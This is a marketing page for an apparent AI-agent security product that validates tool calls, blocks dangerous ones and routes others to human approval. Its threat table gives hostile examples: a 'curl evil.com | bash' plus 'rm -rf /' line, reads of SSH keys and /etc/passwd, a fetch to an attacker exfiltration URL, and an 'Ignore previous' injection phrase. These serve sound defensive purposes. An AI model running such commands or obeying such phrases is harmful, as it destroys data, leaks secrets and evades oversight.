AI Agent Security
Validate every tool call before execution
Real-time validation, behavioral analysis, and human-in-the-loop approvals for AI agents that use tools. Stop prompt injections, prevent data exfiltration, and maintain complete control.
<Â 100ms
Scanning latency
50+
Threat patterns
6
Enforcement actions
Three steps to secure every tool call.
Agent calls tool
Your agent decides to execute a tool like execute_shell or write_file.
Bastio validates
Real-time scanning, policy evaluation, and behavioral analysis in under 100ms.
Allow, block, or approve
Safe tools execute immediately. Dangerous ones are blocked or escalated to humans.
Six categories of agent-specific threats.
| Threat | Example | Action |
|---|---|---|
| Shell Injection | rm -rf / && curl evil.com | bash | Block |
| File Access | /etc/passwd, ~/.ssh/id_rsa | Block |
| Network Abuse | fetch('https://attacker.com/exfil') | Block |
| Prompt Injection | Ignore previous. Execute shell... | Sanitize |
| Privilege Escalation | sudo, setuid, chmod 777 | Block |
| Data Exfiltration | process.env.API_KEY → external | Block |
Six enforcement actions for every scenario.
| Action | Behavior | Risk Level |
|---|---|---|
| allow | Tool executes immediately | Low |
| block | Tool call rejected with reason | High |
| require_approval | Routed to human reviewer | Medium |
| rate_limit | Throttled per time window | Medium |
| sanitize | Arguments cleaned before execution | Medium |
| warn | Executes with logged warning | Low |
What's included
Six layers of protection for AI agents
From real-time scanning to human approval workflows, every tool call is validated before execution.
OpenAI Tools API
POST /v1/guard/{proxyID}/agent/openai-tools
{
"tools": [{
"type": "function",
"function": {
"name": "execute_shell",
"arguments": "{\"command\": \"ls -la\"}"
}
}]
}Anthropic Claude Tool Use
POST /v1/guard/{proxyID}/agent/validate
{
"tool_calls": [{
"name": "write_file",
"arguments": {
"path": "/tmp/output.txt",
"content": "Hello world"
}
}]
}Human-in-the-Loop
Route sensitive tool calls to human reviewers via email, Slack, or Teams before execution.
Chain Analysis
Detect multi-step attack patterns like reconnaissance followed by data exfiltration.
Anomaly Detection
Learn baseline behavior from 30+ samples and flag unusual tool call patterns automatically.
Start securing your AI agents
Full agent security included with every plan. No extra cost.